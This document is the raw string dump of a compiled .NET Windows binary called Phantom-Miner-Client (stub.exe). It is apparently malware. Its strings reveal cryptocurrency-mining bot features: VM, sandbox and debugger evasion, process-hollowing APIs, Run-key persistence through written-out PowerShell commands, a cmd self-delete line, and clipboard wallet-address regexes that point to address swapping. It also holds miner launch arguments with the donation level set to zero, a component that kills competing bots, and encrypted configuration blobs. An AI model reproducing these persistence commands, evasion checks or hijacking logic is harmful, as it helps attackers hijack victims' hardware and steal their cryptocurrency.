!This program cannot be run in DOS mode.
`.rsrc
,q+Ts.
X 8X(q
X <X(q
lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet
PADPADP
4teMzRs
gZ+7I1
4Uv\f(
J2'gkE
k%Z]]Y
sww`vf
TmzjChb
n}z(2j]
+cJi%GW
{<t[)s
6S{16Y
kQtyYt
:kzGhZf/CM7
L31D31'U
sFA|0(+
cxRR_CJ
Ln|O:?
d`(](JSy(
P>:S"SGg&&
dV5,1M
/@EM>;
[>Huxq
P5vUUu
6)(;uo
2 R\Ky{
AtlXrdL|`tLHd
I9 Q(HiS}
%>/W>u
tcs9h*
D'9{&I
gJBGze
JD@%i)
2YVO''
dtmE]l
,C,pTb
wZ]gK*/
ZfqrdTy
3O l\p}
tqOucr
9'"w]s
-Nc/',L
x=wSmP
0<>"8p
.$l{pw
H#"?8dq
W+v^3nq8
costura.costura.dll.compressed|5.5.0.0|Costura, Version=5.5.0.0, Culture=neutral, PublicKeyToken=null|Costura.dll|529B022AC6C547B75D6CCC42F9597557301FFE15|4608
costura.costura.pdb.compressed|||Costura.pdb|B79D0E21DC4E0BBE01B6306A4DA820B9856959D7|2608
costura.messagepacklib.dll.compressed|1.0.0.0|MessagePackLib, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null|MessagePackLib.dll|C93769A1D867EFC983C76D0CC52C65C6CDD69B46|17408
costura.system.runtime.interopservices.runtimeinformation.dll.compressed|4.0.1.0|System.Runtime.InteropServices.RuntimeInformation, Version=4.0.1.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a|System.Runtime.InteropServices.RuntimeInformation.dll|4E490D7EC139A6CDE53E3932D3122A48AA379904|33256
v4.0.30319
#Strings
588896EE364281D343C5B55E1A0280EC8D4143B65E320013C7AABC4E227E53D0
<>c__DisplayClass0_0
<>9__1_0
<Read>b__1_0
<RandomString>b__1_0
<>c__DisplayClass1_0
<>c__DisplayClass2_0
<>9__3_0
<Main>b__3_0
<ReadPacket>b__0
<GetText>b__0
<SetText>b__0
<SendFileToMemoy>b__0
<>9__3_1
<Main>b__3_1
<ReadPacket>b__1
IEnumerable`1
EqualityComparer`1
List`1
__StaticArrayInitTypeSize=32
Microsoft.Win32
ReadInt32
WriteInt32
ToInt32
<ReadPacket>b__2
<>f__AnonymousType0`2
Func`2
Dictionary`2
X509Certificate2
UInt64
ReadInt64
WriteInt64
ToInt64
ReadInt16
HMACSHA256
Sha256
Aes256
aes256
get_UTF8
<Module>
<PrivateImplementationDetails>
forceUAC
MapNameToOID
GetVRAM
GetRAM
antiVM
System.IO
StopXMR
StartXMR
GetGPUS
get_IV
set_IV
GenerateIV
Costura
ReadServertData
costura.metadata
MessagePackLib
mscorlib
set_Verb
System.Collections.Generic
Microsoft.VisualBasic
get_SendSync
grabbtc
grabltc
get_Id
EndRead
BeginRead
ResumeThread
hThread
payload
add_SessionEnded
SystemEvents_SessionEnded
SHA256Managed
isAttached
Interlocked
Enabled
IsInstalled
costura.costura.pdb.compressed
costura.costura.dll.compressed
costura.messagepacklib.dll.compressed
costura.system.runtime.interopservices.runtimeinformation.dll.compressed
get_Connected
get_IsConnected
set_IsConnected
Synchronized
<cryptoType>i__Field
<Regex>i__Field
<SendSync>k__BackingField
<IsConnected>k__BackingField
<usage>k__BackingField
<_V_name>k__BackingField
<KeepAlive>k__BackingField
<HeaderSize>k__BackingField
<Ping>k__BackingField
<stopMining>k__BackingField
<ActivatePong>k__BackingField
<Interval>k__BackingField
<pool>k__BackingField
<bin>k__BackingField
<coin>k__BackingField
<injection>k__BackingField
<Buffer>k__BackingField
<worker>k__BackingField
<pass>k__BackingField
<wallet>k__BackingField
<Offset>k__BackingField
<SslClient>k__BackingField
<TcpClient>k__BackingField
<_V_regex>k__BackingField
antiSand
Append
RegistryValueKind
set_IsBackground
method
Clipboard
Replace
defaultInstance
source
GetHashCode
set_Mode
FileMode
PaddingMode
EnterDebugMode
CryptoStreamMode
CompressionMode
CipherMode
SelectMode
DeleteSubKeyTree
get_Message
get_usage
set_usage
Exchange
nullCache
DetectSandboxie
Invoke
Enumerable
IDisposable
IsWindowVisible
get_Handle
RuntimeFieldHandle
GetModuleHandle
RuntimeTypeHandle
CloseHandle
lHandle
GetTypeFromHandle
ProcessHandle
WaitHandle
get_MainWindowHandle
handle
RemoveFile
InstallFile
IsInRole
WindowsBuiltInRole
get_MainModule
ProcessModule
set_WindowStyle
ProcessWindowStyle
get_Name
get_FileName
set_FileName
GetFileName
lpModuleName
get_FullName
fullName
IsValidDomainName
lpApplicationName
GetName
CheckHostName
GetProcessesByName
requestedAssemblyName
DirectoryName
RegistryName
get__V_name
set__V_name
GetUsername
lpCommandLine
GetCommandLine
Combine
LocalMachine
DetectVirtualMachine
UriHostNameType
ValueType
ProtocolType
flAllocationType
_V_CryptoType
get_cryptoType
SocketType
malware
System.Core
Serversignature
get_Culture
set_Culture
resourceCulture
culture
MethodBase
ApplicationSettingsBase
Dispose
X509Certificate
ValidateServerCertificate
certificate
Allocate
Update
Create
DebuggerBrowsableState
EditorBrowsableState
SetApartmentState
RegistryDelete
CompilerGeneratedAttribute
GuidAttribute
GeneratedCodeAttribute
UnverifiableCodeAttribute
DebuggerNonUserCodeAttribute
DebuggableAttribute
DebuggerBrowsableAttribute
EditorBrowsableAttribute
ComVisibleAttribute
AssemblyTitleAttribute
AssemblyTrademarkAttribute
TargetFrameworkAttribute
DebuggerHiddenAttribute
AssemblyFileVersionAttribute
AssemblyConfigurationAttribute
AssemblyDescriptionAttribute
CompilationRelaxationsAttribute
AssemblyProductAttribute
AssemblyCopyrightAttribute
AssemblyCompanyAttribute
RuntimeCompatibilityAttribute
set_UseShellExecute
DeleteValue
_V_ReturnValue
TryGetValue
SetValue
get_KeepAlive
set_KeepAlive
add_AssemblyResolve
Remove
Phantom-Miner-Connector.exe
set_BlockSize
get_HeaderSize
set_HeaderSize
set_SendBufferSize
set_ReceiveBufferSize
dwSize
set_KeySize
Initialize
SizeOf
CryptoConfig
get_Ping
set_Ping
StartGrabbing
System.Threading
set_Padding
Encoding
CPUMining
CheckIfMining
get_stopMining
set_stopMining
System.Runtime.Versioning
FromBase64String
ToBase64String
RandomString
CultureToString
get_AsString
set_AsString
SetAsString
GetString
get_ActivatePong
set_ActivatePong
Attach
CheckVRAMHigh
StopGPUHigh
StartGPUHigh
GPUMiningHigh
ComputeHash
ComputeStringHash
VerifyHash
get_ExecutablePath
regPath
GetTempPath
GetDropPath
GetFolderPath
grabeth
HmacSha256Length
get_Length
essInformationLength
IvLength
AuthKeyLength
length
EndsWith
StartsWith
MessagePackLib.MessagePack
MsgPack
AsyncCallback
RemoteCertificateValidationCallback
TimerCallback
unpack_msgpack
RegistryKeyPermissionCheck
nullCacheLock
FlushFinalBlock
SendToDisk
SendFileToDisk
AllocHGlobal
FreeHGlobal
critical
Marshal
System.Security.Principal
WindowsPrincipal
AreEqual
get_Interval
set_Interval
System.ComponentModel
Uninstall
kernel32.dll
user32.dll
ntdll.dll
Powershell
get_pool
set_pool
MutexControl
antiEm
ReadStream
LoadStream
GetManifestResourceStream
FileStream
DeflateStream
NetworkStream
SslStream
CryptoStream
MemoryStream
stream
Program
get_Item
set_Item
System
SymmetricAlgorithm
AsymmetricAlgorithm
HashAlgorithm
Random
random
ICryptoTransform
CheckVRAMMedium
StopGPUMedium
StartGPUMedium
GPUMiningMedium
resourceMan
ToBoolean
written
X509Chain
AppDomain
get_CurrentDomain
get_bin
set_bin
get_coin
set_coin
FodyVersion
version
System.IO.Compression
Application
System.Security.Authentication
get_Location
essInformation
destination
System.Configuration
System.Globalization
ZwUnmapViewOfSection
get_injection
set_injection
System.Reflection
ProcessModuleCollection
X509CertificateCollection
MatchCollection
ManagementObjectCollection
Phantom_Miner_Client.Connection
Inspection
set_Position
CryptographicException
ArgumentNullException
ArgumentException
StringComparison
CopyTo
SendInfo
MethodInfo
FileInfo
get_CultureInfo
FileSystemInfo
lpStartupInfo
ParameterInfo
ComputerInfo
lpProcessInfo
ProcessStartInfo
DirectoryInfo
currentApp
System.Linq
<cryptoType>j__TPar
<Regex>j__TPar
enableGrabber
AssemblyLoader
RSACryptoServiceProvider
AesCryptoServiceProvider
IFormatProvider
StringBuilder
SpecialFolder
folder
sender
get_Buffer
set_Buffer
payloadBuffer
lpBuffer
buffer
get_ResourceManager
RegistryManager
SetAsInteger
DetectDebugger
ManagementObjectSearcher
minerMarker
get_worker
set_worker
Phantom_Miner_Client.Handler
SessionEndedEventHandler
ResolveEventHandler
System.CodeDom.Compiler
Installer
BotKiller
Phantom_Miner_Client.Helper
MinerHelper
ProcessHelper
ToUpper
CurrentUser
BitConverter
ToLower
grabxmr
IEnumerator
ManagementObjectEnumerator
GetEnumerator
.cctor
Injector
Phantom-Miner-Connector
Monitor
CreateDecryptor
CreateEncryptor
IntPtr
GetCPUs
SendClientSpecs
System.Diagnostics
Microsoft.VisualBasic.Devices
System.Runtime.InteropServices
System.Runtime.CompilerServices
System.Resources
ReadFromEmbeddedResources
Phantom_Miner_Client.Properties.Resources.resources
DebuggingModes
Matches
GetAssemblies
Phantom_Miner_Client.Properties
bInheritHandles
get_Modules
resourceNames
GetValueNames
symbolNames
assemblyNames
GetProcesses
GetHostAddresses
System.Security.Cryptography.X509Certificates
lpThreadAttributes
lpProcessAttributes
Encode2Bytes
Rfc2898DeriveBytes
ReadAllBytes
WriteAllBytes
DecodeFromBytes
GetAsBytes
GetBytes
get_Flags
AssemblyNameFlags
dwCreationFlags
dwFlags
InitializeSettings
SessionEndedEventArgs
ResolveEventArgs
AntiAnalysis
Equals
SslProtocols
System.Security.Claims
System.Windows.Forms
Contains
System.Text.RegularExpressions
System.Collections
Phantom_Miner_Client.Functions
get_Chars
miners
RuntimeHelpers
GetParameters
SslPolicyErrors
sslPolicyErrors
essInformationClass
get_pass
set_pass
FileAccess
CreateProcess
hProcess
NtSetInformationProcess
GetCurrentProcess
process
IPAddress
lpBaseAddress
lpAddress
Decompress
System.Net.Sockets
set_Arguments
SystemEvents
get_Exists
Concat
Repeat
threat
Format
ManagementBaseObject
ForcePathObject
ManagementObject
Select
Collect
Connect
Reconnect
flProtect
System.Net
ReadPacket
KeepAlivePacket
ClientSocket
get_wallet
set_wallet
get_Offset
set_Offset
get_Default
IAsyncResult
ToUpperInvariant
ToLowerInvariant
Phantom_Miner_Client
InitializeClient
get_SslClient
set_SslClient
get_TcpClient
set_TcpClient
AuthenticateAsClient
System.Management
ClientManagement
alignment
RuntimeEnvironment
lpEnvironment
get_Current
GetCurrent
CheckRemoteDebuggerPresent
isDebuggerPresent
get_RemoteEndPoint
get_EntryPoint
get_Count
GetPathRoot
Decrypt
Encrypt
ParameterizedThreadStart
Convert
ToList
MoveNext
System.Text
GetText
SetText
GetThreadContext
SetThreadContext
lpContext
set_CreateNoWindow
wShowWindow
VirtualAllocEx
get_Regex
get__V_regex
set__V_regex
CloseMutex
CreateMutex
InitializeArray
ToArray
stub_ProcessedByFody
get_Key
set_Key
CreateSubKey
DeleteSubKey
OpenSubKey
get_PublicKey
_authKey
masterKey
ContainsKey
RegistryKey
Phantom_Miner_Client.Cryptography
System.Security.Cryptography
get_Assembly
ResolveAssembly
ReadExistingAssembly
GetExecutingAssembly
GetEntryAssembly
AddressFamily
SendFileToMemoy
BlockCopy
get_TotalPhysicalMemory
SendToMemory
WriteProcessMemory
GetRuntimeDirectory
CreateDirectory
get_SystemDirectory
lpCurrentDirectory
GetCurrentDirectory
InstallRegistry
op_Equality
op_Inequality
System.Security
System.Net.Security
ClaimsIdentity
WindowsIdentity
IsNullOrEmpty
System.Security.Permissions.SecurityPermissionAttribute, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
SkipVerification
WrapNonExceptionThrows
Phantom-Miner-Client
Copyright
2021
$e648d2c2-a2be-4f39-aed9-59c6e121579f
1.0.0.0
.NETFramework,Version=v4.5
FrameworkDisplayName
.NET Framework 4.5
3System.Resources.Tools.StronglyTypedResourceBuilder
16.0.0.0
KMicrosoft.VisualStudio.Editors.SettingsDesigner.SettingsSingleFileGenerator
11.0.0.0
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
! $#('
{{ cryptoType = {0}, Regex = {1} }}
SHA256
RO97fLSrIS3LY37CHTGqDeFz+SP+zguYxOr94UPQwOmQSv73KIYg8ChAIO4M9ZZCO7ayG4w/whiVJzGdvFYUsg==
aWY313sI+7tttbOJ1tCmNauGYuRrOTzw04XnAMRqOEts5lzkrkqNgop1ceJJUmlc9ZwF0smIGB6YYNaEhRKGWU5z/eHoj00x1B470CK8uUE=
AaIm/K2Jah6tng1o/mMwrt6D9XTwLx8shhmBBzFWOEonaYB5VFJTzfqweT0yI/JvkBuDy0n01lI9iFr0hBhhew==
L7YEty8nGVAnl8MvdwPyBG0aLwnlDy66Tur0osA/2pIOcJvxDgWZAKiuxTF2eKtyoigiAUDCzxjr1zjwyy2NXGege0uURYqJSodK/03ILP4=
vtrWmYqnWZbD0atMjRK8EDdruCnNA6A8+47MU3A54Uz9FzbreEigfoKEDzEQgnnhqgc9lB/AJ96TGd/PT9FKmQ==
ow70RwTgcs26C9IhC4F8ZPVztnQipjBc9AOWntYOt3cQuFlmgtTVQFwBYFjszHmATPh5OEvi+y+No5Tv85F/71ApYc1F7of06rHYzFedMN8=
vurdIyR7TQXYShKSF3hMJbwm4TmyNrJD74lUQ8tt0MQKu7/VKMM8+H06EftnZK/1JVoYQDhsFZ+fl54u2o/8rA==
t51S4G6pS7oqVyf8MJWJbwe3PUXn7TGWQttDd0e4UM7gNC8e559W/fIqEVINYCzfl4aoTWnNPkLti7wSe1vqAQ==
dxjHzy908dCopvOkObXZzDc/kUWu13kfz/QMmxsAJ14f+IQ4d0A6OQhJeFxqQglEnb3wPmxhTjpK+UbkQbbe5w==
d8Zjpw9hFgy2Ew3YMscMHrQ4xNLAFDoAs8niKRElnr0MWoPbimi1/eyBOc+kpolMcEFawRZ5zIBSS16eCcBpLw==
iahbY7o8SPNPK5fbgVW+YYDvmMD6TWBjGRIDdDimUeGk3e0H2Bm3bkOkl0URPPu4MkHoufBDuLsTi1KHiaMhWg==
YFozUgCi4EAs8JGdcAP0qdfIvjdJ9eIpZ3h613om3i1qILNNnxWjXd7OglWd5ALWDa5apjNvOw/p7r57ycFixsY2ERdaJlDU4KrYKq8NsAGj4MjQ6NjETSYKS+9WuuQ9hSD00QVLd09/tqloO0Pe5Gd0Vw1ibH47sxlYCcTfg/8ynW/jNAYY7xtlr4vhg81E
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
cmd.exe
/k START "" "
" & EXIT
Phantom_Miner_Client.Properties.Resources
Select * from Win32_ComputerSystem
Manufacturer
microsoft corporation
VIRTUAL
vmware
VirtualBox
SbieDll.dll
^(bc1|[13])[a-zA-HJ-NP-Z0-9]{25,39}$
4[0-9AB][123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz]{93}
^0x[a-fA-F0-9]{40}$
^[LM3][a-km-zA-HJ-NP-Z1-9]{25,34}$
select * from Win32_VideoController
radeon
6700 xt
6900 xt
6800 xt
nvidia
geforce
mobile
quadro
edition
pascal
titan x
titan z
SELECT CommandLine FROM Win32_Process WHERE ProcessId =
CommandLine
TempPath
Environment.SpecialFolder.ApplicationData
Environment.SpecialFolder.LocalApplicationData
Environment.SpecialFolder.CommonApplicationData
Remove-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name '
';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name '
' -Value '"
"' -PropertyType 'String'
powershell.exe
Software\WindowsAutoConfiguration
Packet
MinerClientInfo
Username
Operating System
Payload Version
IsMiningCPU
IsMiningGPU
Antivirus
SELECT * FROM Win32_OperatingSystem
Caption
root\CIMV2
SELECT * FROM Win32_Processor
root\SecurityCenter2
SELECT * FROM AntiVirusProduct
displayName
SendToDisk
SendToMemory
ClientSpecs
sendMinerBinary
saveMinerBinary
CPUStop
GPUMediumStop
GPUHighStop
BotKiller
Client
Extension
Method
Binary
requestMinerBinary
Hashes
Msgpack
GPUMedium
GPUHigh
Failed to read miner packet:
--user
--pool
--url
KilledMiners
KilledMalware
Failed to run BotKiller:
Software\Microsoft\Windows\CurrentVersion\Run
Software\Microsoft\Windows\CurrentVersion\RunOnce
Windows\Microsoft.NET
wscript.exe
uninstall
update
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
/C choice /C Y /N /D Y /T 1 & Del "
Machine Name: {0}
Central Processing Units(CPUs): {1}
Graphical Processing Units(GPUs): {2}
Machine RAM: {3}
Machine Antiviruses: {4}
Machine Operating System: {5}
conhost
svchost
Command
Wallet
Worker
Password
Injection
--algo rx/0 --donate-level 0 --max-cpu-usage
RuntimeBroker
--user
--pool
dllhost
NoVRAM
Ethereum
--log off --nocolor --algo ETHASH --pool
--print-full --algo kawpow --url stratum+tcp://
--worker
--pass
--api-worker-id=
Classic
--log off --nocolor --algo ETCHASH --pool
Failed to get cmd line args for miner
LoadPE
masterKey can not be null or empty.
input can not be null.
Invalid message authentication code (MAC).
ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789
.compressed
costura
costura.costura.dll.compressed
costura.costura.pdb.compressed
messagepacklib
costura.messagepacklib.dll.compressed
system.runtime.interopservices.runtimeinformation
costura.system.runtime.interopservices.runtimeinformation.dll.compressed
6.5.2.0
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
000004b0
Comments
CompanyName
FileDescription
Phantom-Miner-Client
FileVersion
1.0.0.0
InternalName
stub.exe
LegalCopyright
Copyright
2021
LegalTrademarks
OriginalFilename
stub.exe
ProductName
Phantom-Miner-Client
ProductVersion
1.0.0.0
Assembly Version
1.0.0.0